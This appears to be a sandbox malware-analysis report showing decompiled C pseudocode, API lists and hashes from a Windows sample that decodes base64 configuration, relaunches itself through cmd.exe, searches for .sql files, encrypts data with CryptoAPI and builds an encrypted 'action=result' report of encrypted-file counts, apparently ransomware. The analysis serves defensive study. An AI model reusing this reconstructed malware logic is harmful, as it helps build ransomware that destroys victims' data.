                                      						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
                                      						_v356 = _t108;
                                      						__eflags = _t108 - 0xffffffff;
                                      						if(_t108 != 0xffffffff) {
                                      							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
                                      							_v28 = _t77;
                                      							__eflags = _t77;
                                      							if(_t77 != 0) {
                                      								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
                                      								_v16 = _t79;
                                      								__eflags = _t79;
                                      								if(_t79 != 0) {
                                      									_t41 = _t79 + 0x4e; // 0x4e
                                      									_t132 = _t41;
                                      									_v12 = _t132;
                                      									_t81 = lstrlenW(_t125);
                                      									_t109 = 0;
                                      									_t126 =  &(_t125[_t81]);
                                      									_t82 = lstrlenA(_t132);
                                      									__eflags = _t82 + _t82;
                                      									if(_t82 + _t82 != 0) {
                                      										_t117 = _t132;
                                      										do {
                                      											__eflags = _t109 & 0x00000001;
                                      											if((_t109 & 0x00000001) != 0) {
                                      												 *((char*)(_t126 + _t109)) = 0;
                                      											} else {
                                      												_t87 =  *_t132;
                                      												_t132 =  &(_t132[1]);
                                      												 *((char*)(_t126 + _t109)) = _t87;
                                      											}
                                      											_t109 = _t109 + 1;
                                      											_t85 = lstrlenA(_t117);
                                      											_t117 = _v12;
                                      											__eflags = _t109 - _t85 + _t85;
                                      										} while (_t109 < _t85 + _t85);
                                      									}
                                      									UnmapViewOfFile(_v16);
                                      									_t108 = _v20;
                                      									_t131 = _v24;
                                      								}
                                      								CloseHandle(_v28);
                                      							}
                                      							CloseHandle(_t108);
                                      						}
                                      						return VirtualFree(_t131, 0, 0x8000);
                                      					} else {
                                      						_t127 = _v28;
                                      						_v12 = 1;
                                      						if(_t127 != 0) {
                                      							_t97 = lstrlenA(_t127);
                                      							_v8 = _t97;
                                      							_t24 = _t97 + 1; // 0x1
                                      							_t134 = _t24;
                                      							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
                                      							_v36 = _t98;
                                      							if(_t98 == 0 || _v8 >= _t134) {
                                      								_t135 = 0;
                                      								__eflags = 0;
                                      							} else {
                                      								_t135 = _t98;
                                      							}
                                      							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
                                      								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
                                      								if(_t111 != 0) {
                                      									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
                                      										GetLastError();
                                      									} else {
                                      										 *0x412b00 = _t111;
                                      									}
                                      								}
                                      							}
                                      							VirtualFree(_v36, 0, 0x8000);
                                      						}
                                      						_t33 =  &_v24; // 0x4054e4
                                      						_t133 =  *_t33;
                                      						if(_t133 != 0) {
                                      							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
                                      							 *_v40 = _t95;
                                      							if(_t95 != 0) {
                                      								lstrcpyA(_t95, _t133);
                                      							}
                                      						}
                                      						_t88 = GetProcessHeap;
                                      						if(_t127 != 0) {
                                      							HeapFree(GetProcessHeap(), 0, _t127);
                                      							_t88 = GetProcessHeap;
                                      						}
                                      						if(_t133 != 0) {
                                      							HeapFree( *_t88(), 0, _t133);
                                      						}
                                      						_t129 = _v12;
                                      						L26:
                                      						VirtualFree(_v44, 0, 0x8000);
                                      						return _t129;
                                      					}
                                      				}
                                      			}




















































                                      0x0040505d
                                      0x00405062
                                      0x00405065
                                      0x0040506b
                                      0x00405071
                                      0x00405079
                                      0x0040507c
                                      0x0040507c
                                      0x00405082
                                      0x00405084
                                      0x00405089
                                      0x00405094
                                      0x00405094
                                      0x00405090
                                      0x00405090
                                      0x00405090
                                      0x00405096
                                      0x004050a5
                                      0x004050ab
                                      0x004050ad
                                      0x0040525e
                                      0x00000000
                                      0x004050b3
                                      0x004050b3
                                      0x004050b8
                                      0x004050c0
                                      0x004050c3
                                      0x004050c6
                                      0x004050cc
                                      0x004050d0
                                      0x004050da
                                      0x004050e6
                                      0x004050eb
                                      0x004050f2
                                      0x0040510e
                                      0x0040511c
                                      0x00405124
                                      0x00405127
                                      0x0040512a
                                      0x00405130
                                      0x00405139
                                      0x00405266
                                      0x0040526b
                                      0x0040526c
                                      0x0040526d
                                      0x0040526e
                                      0x0040526f
                                      0x00405276
                                      0x00405277
                                      0x00405278
                                      0x00405287
                                      0x0040528f
                                      0x00405299
                                      0x0040529c
                                      0x004052bb
                                      0x004052bd
                                      0x004052c0
                                      0x004052c3
                                      0x004052d4
                                      0x004052da
                                      0x004052dd
                                      0x004052df
                                      0x004052ea
                                      0x004052f0
                                      0x004052f3
                                      0x004052f5
                                      0x004052f7
                                      0x004052f7
                                      0x004052fb
                                      0x004052fe
                                      0x00405305
                                      0x00405307
                                      0x0040530a
                                      0x00405310
                                      0x00405312
                                      0x00405314
                                      0x00405316
                                      0x00405316
                                      0x00405319
                                      0x00405323
                                      0x0040531b
                                      0x0040531b
                                      0x0040531d
                                      0x0040531e
                                      0x0040531e
                                      0x00405328
                                      0x00405329
                                      0x0040532f
                                      0x00405334
                                      0x00405334
                                      0x00405316
                                      0x0040533b
                                      0x00405341
                                      0x00405344
                                      0x00405344
                                      0x0040534a
                                      0x0040534a
                                      0x00405351
                                      0x00405351
                                      0x0040536b
                                      0x0040513f
                                      0x0040513f
                                      0x00405142
                                      0x0040514b
                                      0x00405152
                                      0x0040515f
                                      0x00405162
                                      0x00405162
                                      0x00405168
                                      0x0040516a
                                      0x0040516f
                                      0x0040517a
                                      0x0040517a
                                      0x00405176
                                      0x00405176
                                      0x00405176
                                      0x00405192
                                      0x004051aa
                                      0x004051ae
                                      0x004051c8
                                      0x004051d2
                                      0x004051ca
                                      0x004051ca
                                      0x004051ca
                                      0x004051c8
                                      0x004051d8
                                      0x004051e8
                                      0x004051e8
                                      0x004051ee
                                      0x004051ee
                                      0x004051f3
                                      0x00405207
                                      0x0040520c
                                      0x00405210
                                      0x00405214
                                      0x00405214
                                      0x00405210
                                      0x00405220
                                      0x00405227
                                      0x0040522f
                                      0x00405231
                                      0x00405231
                                      0x00405238
                                      0x00405240
                                      0x00405240
                                      0x00405242
                                      0x00405245
                                      0x0040524f
                                      0x0040525d
                                      0x0040525d
                                      0x00405139

                                      APIs
                                      • lstrlenA.KERNEL32(?,00000001,?,?), ref: 00405065
                                      • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405082
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004050A5
                                      • _memset.LIBCMT ref: 004050F2
                                      • lstrlenA.KERNEL32(?), ref: 004050FE
                                      • lstrlenA.KERNEL32(?,00000000), ref: 00405152
                                      • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00405168
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0040518A
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004051A8
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 004051C0
                                      • GetLastError.KERNEL32 ref: 004051D2
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004051E8
                                      • lstrlenA.KERNEL32(T@,00003000,00000004,00000000), ref: 004051FD
                                      • VirtualAlloc.KERNEL32(00000000,00000001), ref: 00405207
                                      • lstrcpyA.KERNEL32(00000000,T@), ref: 00405214
                                      • HeapFree.KERNEL32(00000000), ref: 0040522F
                                      • HeapFree.KERNEL32(00000000), ref: 00405240
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040524F
                                      • GetLastError.KERNEL32 ref: 0040525E
                                        • Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
                                        • Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
                                        • Part of subcall function 00404FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
                                        • Part of subcall function 00404FD0: wsprintfW.USER32 ref: 00405019
                                        • Part of subcall function 00404FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
                                        • Part of subcall function 00404FD0: ExitProcess.KERNEL32 ref: 0040503B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
                                      • String ID: #shasj$T@
                                      • API String ID: 463976167-3786297935
                                      • Opcode ID: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
                                      • Instruction ID: a9872d5510dab6a1258aa89b5c1af8b8eb6182ffb0005660de6a3b244a0720a6
                                      • Opcode Fuzzy Hash: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
                                      • Instruction Fuzzy Hash: 54519471E01215ABEB209BA59D49BAF7BB8EF48710F100065FA05BA2D1DB749D01CFA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004064A0(WCHAR* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				long _v24;
                                      				struct _WIN32_FIND_DATAW _v620;
                                      				int _t38;
                                      				struct _SECURITY_ATTRIBUTES* _t40;
                                      				int _t50;
                                      				WCHAR* _t52;
                                      				intOrPtr _t53;
                                      				void* _t54;
                                      				WCHAR* _t57;
                                      				long _t64;
                                      				WCHAR* _t66;
                                      				void* _t67;
                                      
                                      				_t66 = __ecx;
                                      				_v16 = __ecx;
                                      				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                      				_v20 = _t52;
                                      				lstrcatW(_t66, "*");
                                      				_v8 = FindFirstFileW(_t66,  &_v620);
                                      				 *_t52 = 0;
                                      				_t53 = 0;
                                      				do {
                                      					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                      						goto L20;
                                      					} else {
                                      						lstrcatW(_t66,  &(_v620.cFileName));
                                      						_t38 = lstrlenW(_t66);
                                      						_t10 = _t38 - 1; // -1
                                      						_t57 =  &(_t66[_t10]);
                                      						if(_t38 == 0) {
                                      							L18:
                                      							_t53 = 0;
                                      							goto L19;
                                      						} else {
                                      							while( *_t57 != 0x2e) {
                                      								_t57 = _t57 - 2;
                                      								_t38 = _t38 - 1;
                                      								if(_t38 != 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							if(_t38 == 0) {
                                      								goto L18;
                                      							} else {
                                      								_t40 = lstrcmpW(_t57, L".sql");
                                      								if(_t40 != 0) {
                                      									goto L18;
                                      								} else {
                                      									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                      									_t64 = GetFileSize(_t54, 0);
                                      									_v12 = 0;
                                      									if(_t64 < 0x40000000) {
                                      										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                      										if(_t67 != 0) {
                                      											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00407C10(_t67, "*******************") != 0) {
                                      												_t50 = lstrlenA("*******************");
                                      												_t15 = _t67 + 1; // 0x1
                                      												_v12 = E00406440(_t15 + _t50);
                                      											}
                                      											VirtualFree(_t67, 0, 0x8000);
                                      										}
                                      										_t66 = _v16;
                                      									}
                                      									CloseHandle(_t54);
                                      									_t53 = _v12;
                                      									if(_t53 == 0) {
                                      										L19:
                                      										 *_v20 = 0;
                                      										goto L20;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					break;
                                      					L20:
                                      				} while (FindNextFileW(_v8,  &_v620) != 0);
                                      				FindClose(_v8);
                                      				return _t53;
                                      			}



















                                      0x004064ab
                                      0x004064af
                                      0x004064be
                                      0x004064c1
                                      0x004064c4
                                      0x004064de
                                      0x004064e3
                                      0x004064e6
                                      0x004064f0
                                      0x00406500
                                      0x00000000
                                      0x0040651c
                                      0x00406524
                                      0x0040652b
                                      0x00406531
                                      0x00406534
                                      0x00406539
                                      0x00406608
                                      0x00406608
                                      0x00000000
                                      0x00406540
                                      0x00406540
                                      0x00406546
                                      0x00406549
                                      0x0040654a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040654a
                                      0x0040654e
                                      0x00000000
                                      0x00406554
                                      0x0040655a
                                      0x0040655e
                                      0x00000000
                                      0x00406564
                                      0x00406577
                                      0x00406582
                                      0x00406586
                                      0x0040658f
                                      0x004065a0
                                      0x004065a4
                                      0x004065b7
                                      0x004065ce
                                      0x004065d4
                                      0x004065de
                                      0x004065de
                                      0x004065e9
                                      0x004065e9
                                      0x004065ef
                                      0x004065ef
                                      0x004065f3
                                      0x004065f9
                                      0x004065fe
                                      0x0040660a
                                      0x0040660f
                                      0x00000000
                                      0x0040660f
                                      0x004065fe
                                      0x0040655e
                                      0x0040654e
                                      0x00406539
                                      0x00000000
                                      0x00406612
                                      0x00406622
                                      0x0040662d
                                      0x0040663b

                                      APIs
                                      • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
                                      • lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00406524
                                      • lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
                                      • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
                                      • lstrlenA.KERNEL32(*******************,?,?), ref: 004065CE
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004065E9
                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 004065F3
                                      • FindNextFileW.KERNEL32(?,?,?,?), ref: 0040661C
                                      • FindClose.KERNEL32(?,?,?), ref: 0040662D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                      • String ID: *******************$.sql
                                      • API String ID: 3616287438-58436570
                                      • Opcode ID: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
                                      • Instruction ID: d8231c9366fa09183c7f9a28845eb84a492a5b8a9a6307543842452b5fb504c9
                                      • Opcode Fuzzy Hash: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
                                      • Instruction Fuzzy Hash: 24419271601219ABEB209B609D48FAB77BCEF44704F11447AF902F6191EB799E50CB6C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E00405540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				BYTE* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				int _v20;
                                      				char _v22;
                                      				short _v24;
                                      				short _v28;
                                      				char _v36;
                                      				char _v180;
                                      				char _v435;
                                      				char _v436;
                                      				WCHAR* _t40;
                                      				signed int _t48;
                                      				int _t60;
                                      				void* _t61;
                                      				char _t68;
                                      				CHAR* _t71;
                                      				void* _t74;
                                      				short _t79;
                                      				short _t80;
                                      				char _t81;
                                      				BYTE* _t84;
                                      				WCHAR* _t92;
                                      				signed int _t93;
                                      				char* _t95;
                                      				void* _t96;
                                      				int _t98;
                                      				long _t99;
                                      				void* _t100;
                                      
                                      				_t74 = __ecx;
                                      				_t96 = __edx;
                                      				_v12 = __ecx;
                                      				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                      				_v16 = _t40;
                                      				if(_t40 == 0) {
                                      					_t92 = 0;
                                      					_t71 = 0;
                                      				} else {
                                      					_t3 =  &(_t40[0x400]); // 0x800
                                      					_t71 = _t3;
                                      					_t92 = _t40;
                                      				}
                                      				_push(_t96);
                                      				_v8 = _t92;
                                      				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				E004039B0( &_v180);
                                      				E00406D90( &_v180);
                                      				E00406BA0( &_v180);
                                      				E004069A0( &_v180,  &(_t92[lstrlenW(_t92)]));
                                      				_t48 = lstrlenW(_t92);
                                      				_t79 = "#shasj"; // 0x61687323
                                      				_t93 = _t48;
                                      				asm("movq xmm0, [0x410128]");
                                      				_v28 = _t79;
                                      				_t80 =  *0x410134; // 0x6a73
                                      				_v24 = _t80;
                                      				_t81 =  *0x410136; // 0x0
                                      				asm("movq [ebp-0x20], xmm0");
                                      				_v22 = _t81;
                                      				_v436 = 0;
                                      				E00408B30( &_v435, 0, 0xff);
                                      				E00405C40( &_v436,  &_v36, lstrlenA( &_v36));
                                      				_t98 = _t93 + _t93;
                                      				E00405CF0( &_v436, _v8, _t98);
                                      				_v20 = _t93 * 8;
                                      				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
                                      					GetLastError();
                                      				}
                                      				_t29 = lstrlenA(_t71) + 4; // 0x4
                                      				_t99 = _t29;
                                      				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
                                      				_t60 = lstrlenA(_t71);
                                      				_t84 = _v12;
                                      				_t61 = _t60 + 2;
                                      				if(_t84 == 0) {
                                      					L7:
                                      					_v8 = 0;
                                      				} else {
                                      					_v8 = _t84;
                                      					if(_t61 >= _t99) {
                                      						goto L7;
                                      					}
                                      				}
                                      				_t100 = 0;
                                      				if(lstrlenA(_t71) != 0) {
                                      					_t95 = _v8;
                                      					do {
                                      						_t68 =  *((intOrPtr*)(_t100 + _t71));
                                      						if(_t68 != 0xa && _t68 != 0xd) {
                                      							 *_t95 = _t68;
                                      							_t95 = _t95 + 1;
                                      						}
                                      						_t100 = _t100 + 1;
                                      					} while (_t100 < lstrlenA(_t71));
                                      				}
                                      				E00405370(_v8, 0, 0);
                                      				_t73 =  !=  ? 1 : 0;
                                      				VirtualFree(_v12, 0, 0x8000);
                                      				E00407720( &_v180);
                                      				VirtualFree(_v16, 0, 0x8000);
                                      				_t67 =  !=  ? 1 : 0;
                                      				return  !=  ? 1 : 0;
                                      			}
































                                      0x00405540
                                      0x0040555a
                                      0x0040555c
                                      0x0040555f
                                      0x00405565
                                      0x0040556a
                                      0x00405576
                                      0x00405578
                                      0x0040556c
                                      0x0040556c
                                      0x0040556c
                                      0x00405572
                                      0x00405572
                                      0x0040557a
                                      0x0040557e
                                      0x0040558d
                                      0x00405596
                                      0x00405598
                                      0x00405599
                                      0x0040559e
                                      0x004055a0
                                      0x004055a1
                                      0x004055a3
                                      0x004055a4
                                      0x004055a6
                                      0x004055a7
                                      0x004055a9
                                      0x004055aa
                                      0x004055af
                                      0x004055b1
                                      0x004055b2
                                      0x004055ba
                                      0x004055c5
                                      0x004055d0
                                      0x004055e8
                                      0x004055ee
                                      0x004055f0
                                      0x004055f6
                                      0x004055f8
                                      0x00405606
                                      0x00405609
                                      0x00405615
                                      0x00405619
                                      0x00405622
                                      0x00405627
                                      0x0040562a
                                      0x00405631
                                      0x0040564d
                                      0x00405655
                                      0x00405662
                                      0x00405671
                                      0x0040568a
                                      0x0040568c
                                      0x0040568c
                                      0x004056a2
                                      0x004056a2
                                      0x004056af
                                      0x004056b2
                                      0x004056b4
                                      0x004056b7
                                      0x004056bc
                                      0x004056c5
                                      0x004056c5
                                      0x004056be
                                      0x004056be
                                      0x004056c3
                                      0x00000000
                                      0x00000000
                                      0x004056c3
                                      0x004056cd
                                      0x004056d3
                                      0x004056d5
                                      0x004056d8
                                      0x004056d8
                                      0x004056dd
                                      0x004056e3
                                      0x004056e5
                                      0x004056e5
                                      0x004056e7
                                      0x004056ee
                                      0x004056d8
                                      0x004056f9
                                      0x00405713
                                      0x00405720
                                      0x00405728
                                      0x00405737
                                      0x0040573b
                                      0x00405741

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0040555F
                                      • wsprintfW.USER32 ref: 0040558D
                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055DC
                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055EE
                                      • _memset.LIBCMT ref: 00405631
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0040563D
                                      • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 00405682
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0040568C
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00405699
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 004056A8
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056B2
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056CF
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056E8
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405720
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405737
                                      Strings
                                      • #shasj, xrefs: 004055F0
                                      • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00405587
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                      • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                      • API String ID: 2994799111-4131875188
                                      • Opcode ID: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
                                      • Instruction ID: 65ff7d96991e722c176764c3897e6b24fa244fe7beac740f882282c65e832afb
                                      • Opcode Fuzzy Hash: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
                                      • Instruction Fuzzy Hash: B4519F71A00219AAEB20AB65DD46FEF7B79EF44704F100079E605B62D1DB746E04CFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E00406000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, char _a20) {
                                      				long* _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				char _v20;
                                      				long _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				long** _t26;
                                      				char* _t31;
                                      				int _t33;
                                      				long _t36;
                                      
                                      				EnterCriticalSection(0x412ae8);
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t26 =  &_v8;
                                      				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                      				if(_t26 != 0) {
                                      					L6:
                                      					_v16 = 0;
                                      					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                      						_v20 = 0xa;
                                      						_t31 =  &_v20;
                                      						_t12 =  &_v28; // 0x403724
                                      						__imp__CryptGetKeyParam(_v12, 8, _t12, _t31, 0);
                                      						_v32 = _t31;
                                      						 *_a16 = 0xc8;
                                      						_t16 =  &_a20; // 0x403724
                                      						_t33 = _a12;
                                      						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16,  *_t16);
                                      						_v16 = _t33;
                                      						_v24 = GetLastError();
                                      						if(_v16 == 0) {
                                      							E004034F0(_t34);
                                      						}
                                      					}
                                      					CryptReleaseContext(_v8, 0);
                                      					LeaveCriticalSection(0x412ae8);
                                      					return _v16;
                                      				}
                                      				_t36 = GetLastError();
                                      				if(_t36 != 0x80090016) {
                                      					return 0;
                                      				}
                                      				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                      				if(_t36 != 0) {
                                      					goto L6;
                                      				}
                                      				return 0;
                                      			}














                                      0x0040600b
                                      0x00406011
                                      0x00406018
                                      0x0040602a
                                      0x0040602e
                                      0x00406036
                                      0x0040606e
                                      0x0040606e
                                      0x00406091
                                      0x00406093
                                      0x0040609c
                                      0x004060a0
                                      0x004060aa
                                      0x004060b0
                                      0x004060b6
                                      0x004060bc
                                      0x004060c4
                                      0x004060d2
                                      0x004060d8
                                      0x004060e1
                                      0x004060e8
                                      0x004060ed
                                      0x004060ed
                                      0x004060e8
                                      0x004060f8
                                      0x00406103
                                      0x00000000
                                      0x00406109
                                      0x00406038
                                      0x00406043
                                      0x00000000
                                      0x00406067
                                      0x00406054
                                      0x0040605c
                                      0x00000000
                                      0x00406065
                                      0x00000000

                                      APIs
                                      • EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
                                      • GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
                                      • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
                                      • CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
                                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
                                      • GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
                                      • LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
